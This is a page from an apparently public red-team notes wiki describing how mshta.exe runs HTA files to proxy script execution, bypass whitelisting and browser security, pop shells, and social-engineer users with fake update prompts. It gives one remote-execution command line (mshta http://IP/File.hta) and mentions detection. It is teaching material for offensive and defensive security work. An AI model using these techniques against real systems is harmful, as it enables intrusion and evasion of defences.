📓
Red Team Notes
  • Introduction
  • Red Team Notes 2.0
  • Red Team
  • Initial Access
    • Spear Phishing Links
      • HTA Files
      • Binaries
      • PDF Files
      • SET(Social-Engineering Toolkit)
    • Spear Phishing Attachments
      • Macros
      • Dynamic Data Exchange
      • SCR Files
      • LNK Files
    • (+) Links and Attachments
  • Execution
    • Component Object Model and Distributed COM
    • MSHTA
    • PowerShell
    • Rundll32
    • Scheduled Tasks
    • Scripting
    • Trusted Developer Utilities
      • MSBuild
      • Regsvr32
    • Windows Remote Management
    • Windows Management Instrumentation (WMI)
  • Persistence
    • Scheduled Tasks
    • Create Account
    • DLL Search Order Hijacking
    • Hooking
    • Logon Scripts
    • Modify Existing Service
    • New Service
    • Path Interception
    • Registry Keys / StartUp Folder
    • ShortCut Modification
  • Privesc
    • Access Token Manipulation
    • DLL Search Order Hijacking
    • Exploitation for Privesc
    • File System Permissions Weakness
    • Always Install Elevated
  • Defense Evasion
  • Credential Access
    • Credential Dumping
    • Kerberoasting
    • LLMNR/NBT-NS Poisoning and Relay
  • Discovery
  • Lateral Movement
    • Pass the Ticket
    • Pass the Hash
    • Remote Desktops
    • Internal Spearphishing
    • Windows Admin Shares
    • Component Object Model and Distributed COM
    • Windows Remote Management
  • Collection
  • Command and Control
  • Exfiltration
  • Impact
  • Active Directory
    • Introduction
      • Kerberos
      • LDAP
    • Enumeration
    • Attacks
      • Unconstrained Delegation
      • Constrained Delegation
      • DCSync
      • Kerberoasting
      • Silver Tickets
      • Golden Tickets
  • Detection
    • Detection
    • Initial Access
    • Execution
      • MSHTA (Detection)
  • Resources & References
    • References & Resources
Powered by GitBook
On this page

Was this helpful?

  1. Execution

MSHTA

Microsoft HTML Applications

PreviousComponent Object Model and Distributed COMNextPowerShell

Last updated 5 years ago

Was this helpful?

Mshta is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension hta.HTA's are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.

Adversaries can use mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows Utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code.

Files may be executed through an inline script and can also be executed directly from URL's. Mshta.exe can be used to bypass application whitelisting solutions that do not account for it's potential use. Since mshta executes outside of the internet explorer security context, it also bypasses browser security settings.

Some example's of mshta running:

In this demo I execute a VBScript one liner just calling a simple MsgBox prompting that code was executed, but can we go a bit further?. What about using this for enumeration? Or calling a Shell?

A shell caught with Metasploits handler

What about some Social Engineering asking them to install an "update'?. We can modify this more extensively so when they click OK they will be asked to download and execute a file of our choice.

Can we do it on a remote host without downloading to the target machine? MSHTA can also call file from a remote server the syntax is as simple as mshta http://IP/File.hta on this example the HTA file executes Calc.exe.

These are a few of many ways to use mshta to execute code it's just creativity on what it can be used for and how can it help on a red team job, we talked how it can bypass AV's and avoid any mysterious logs, but any experienced Blue Team analyst can tell that it is very weird for mshta to call cmd.exe this is just a way to minimize the footprint.

Vb Script One-Liner
HTA file shell
Calling calc.exe